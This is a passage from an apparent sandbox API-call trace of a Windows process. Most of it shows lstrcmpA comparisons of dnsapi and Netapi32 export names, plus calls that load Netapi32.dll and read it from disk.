returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.839] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0103.840] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0103.840] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0103.841] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0103.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0103.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0103.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0103.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0103.842] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0103.842] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0103.842] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0103.842] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0103.842] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0103.842] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0103.843] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0103.853] GetProcessHeap () returned 0x5b0000 [0103.853] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x3a5d010 | out: hHeap=0x5b0000) returned 1 [0103.853] GetProcessHeap () returned 0x5b0000 [0103.853] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c9140 [0103.854] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0103.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0103.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0103.857] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0103.857] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0103.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0103.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0103.857] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0103.857] GetProcessHeap () returned 0x5b0000 [0103.857] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x13b00) returned 0x2d25030 [0103.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0103.858] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0103.858] CloseHandle (hObject=0x17c) returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0103.859] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0103.860] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0103.861] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0103.862] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0103.863] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0103.864] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 